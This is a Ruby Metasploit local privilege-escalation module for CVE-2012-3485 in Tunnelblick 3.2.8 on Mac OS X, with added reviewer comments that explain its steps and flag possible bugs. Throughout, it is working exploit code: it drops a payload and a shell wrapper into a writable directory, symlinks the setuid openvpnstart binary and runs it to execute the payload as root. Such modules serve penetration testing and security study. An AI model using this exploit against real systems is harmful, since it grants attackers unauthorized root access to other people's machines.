##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # NOTE(review): the rank is Excellent while the 'Notes' block below declares
  # Reliability/Stability/SideEffects as UNKNOWN; the two are not obviously
  # consistent and may be worth reconciling.
  Rank = ExcellentRanking

  # Mixins supplying the helpers called below — is_root?, file?/writable?/
  # write_file/file_rm, and generate_payload_exe respectively. Which mixin
  # provides which is assumed from their names; confirm against the framework.
  include Msf::Post::OSX::Priv
  include Msf::Post::File
  include Msf::Exploit::EXE

  # Registers the module metadata (name, description, references, targets,
  # default options) and the two datastore options this module reads.
  #
  # Both option values are interpolated unquoted into shell command strings
  # (see #check, #clean and #exploit), so a value containing whitespace or
  # shell metacharacters will not reach the target command intact.
  #
  # @param info [Hash] metadata merged in by update_info; defaults to {}
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Setuid Tunnelblick Privilege Escalation',
          'Description' => %q{
            This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The
            vulnerability exists in the setuid openvpnstart, where an insufficient
            validation of path names allows execution of arbitrary shell scripts as root.
            This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099
            over Mac OS X 10.7.5.
          },
          'References' => [
            [ 'CVE', '2012-3485' ],
            [ 'OSVDB', '84706' ],
            [ 'EDB', '20443' ],
            [ 'URL', 'http://blog.zx2c4.com/791' ]
          ],
          'License' => MSF_LICENSE,
          'Author' => [
            'Jason A. Donenfeld', # Vulnerability discovery and original Exploit
            'juan vazquez' # Metasploit module
          ],
          'DisclosureDate' => '2012-08-11',
          'Platform' => 'osx',
          'SessionTypes' => [ 'shell' ],
          'Targets' => [
            [ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],
            [ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]
          ],
          # Framework-level defaults: PrependSetresuid prepends a setresuid()
          # call to the payload and WfsDelay is the session wait in seconds
          # (meanings taken from the option names — confirm in the framework).
          'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },
          'DefaultTarget' => 0,
          'Notes' => {
            'Reliability' => UNKNOWN_RELIABILITY,
            'Stability' => UNKNOWN_STABILITY,
            'SideEffects' => UNKNOWN_SIDE_EFFECTS
          }
        }
      )
    )
    register_options [
      # These are not OptPath because it's a *remote* path
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
      OptString.new('Tunnelblick', [ true, 'Path to setuid openvpnstart executable', '/Applications/Tunnelblick.app/Contents/Resources/openvpnstart' ])
    ]
  end

  # The target-side staging directory (the WritableDir option) as a String.
  #
  # to_s maps a nil datastore value to '', in which case the paths built from
  # it below collapse to '/openvpn', '/<link>' and so on. WritableDir is marked
  # required, so that is presumably unreachable, but nothing here guards it.
  #
  # @return [String]
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Reports whether the configured openvpnstart looks exploitable.
  #
  # Returns CheckCode::Safe unless the Tunnelblick path exists as a file and
  # `find` lists it as a root-owned regular file with the setuid bit
  # (-perm -4000); otherwise CheckCode::Vulnerable. No version is inspected,
  # so the verdict depends only on ownership and the setuid bit.
  #
  # @return [CheckCode] CheckCode::Safe or CheckCode::Vulnerable
  def check
    unless file? datastore['Tunnelblick']
      vprint_error 'openvpnstart not found'
      return CheckCode::Safe
    end

    # NOTE(review): the local `check` shadows this method's own name, and the
    # test below is a substring match on the whole command output, so any
    # output line that echoes the path (e.g. an error message from find)
    # would satisfy it as well.
    check = cmd_exec("find #{datastore['Tunnelblick']} -type f -user root -perm -4000")

    unless check.include? 'openvpnstart'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # Removes the artifacts created by #exploit: the symlink stored in @link and
  # the whole <WritableDir>/openvpn tree. Relies on @link having been set, so
  # it is only meaningful once #exploit has created the link.
  def clean
    file_rm(@link)
    cmd_exec("rm -rf #{base_dir}/openvpn")
  end

  # Runs the privilege escalation against the current session.
  #
  # Preconditions (each aborts via fail_with): the session must not already be
  # root, #check must return Vulnerable, and WritableDir must be writable.
  #
  # Artifacts written to the target, which is also what a responder would find
  # on the host afterwards:
  #   - <WritableDir>/openvpn/openvpn-0/<random alpha name>  the payload (@exe_file)
  #   - <WritableDir>/openvpn/openvpn-0/openvpn              a two-line sh wrapper
  #                                                           that runs @exe_file (@sh_file)
  #   - <WritableDir>/<random alpha name>                    a symlink to the
  #                                                           configured openvpnstart (@link)
  # openvpnstart is then invoked through the symlink with `OpenVPNInfo 0`; per
  # the module 'Description', the insufficient path validation in the setuid
  # binary is what this relies on.
  #
  # On success the files are deliberately left in place and a warning names
  # them; #clean is only called if cmd_exec raises while running the link.
  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    print_status('Creating directory...')
    cmd_exec "mkdir -p #{base_dir}/openvpn/openvpn-0"

    exe_name = rand_text_alpha(8)
    @exe_file = "#{base_dir}/openvpn/openvpn-0/#{exe_name}"
    print_status("Dropping executable #{@exe_file}")
    write_file(@exe_file, generate_payload_exe)
    cmd_exec "chmod +x #{@exe_file}"

    # <<~ strips the common leading indentation, so the script body is
    # "#!/bin/sh\n<@exe_file>\n" regardless of how this source is indented.
    evil_sh = <<~EOF
      #!/bin/sh
      #{@exe_file}
    EOF

    @sh_file = "#{base_dir}/openvpn/openvpn-0/openvpn"
    print_status("Dropping shell script #{@sh_file}...")
    write_file(@sh_file, evil_sh)
    cmd_exec "chmod +x #{@sh_file}"

    link_name = rand_text_alpha(8)
    @link = "#{base_dir}/#{link_name}"
    print_status("Creating symlink #{@link}...")
    cmd_exec "ln -s -f -v #{datastore['Tunnelblick']} #{@link}"

    print_status('Running...')
    begin
      cmd_exec "#{@link} OpenVPNInfo 0"
    rescue StandardError
      # NOTE(review): this branch is reached only if cmd_exec itself raises;
      # a command that merely exits non-zero may come back as output instead —
      # confirm, since in that case this failure path (and the cleanup) never runs.
      print_error("Failed. Cleaning files #{@link} and the #{base_dir}/openvpn directory")
      clean
      return
    end
    print_warning("Remember to clean files: #{@link} and the #{base_dir}/openvpn directory")
  end
end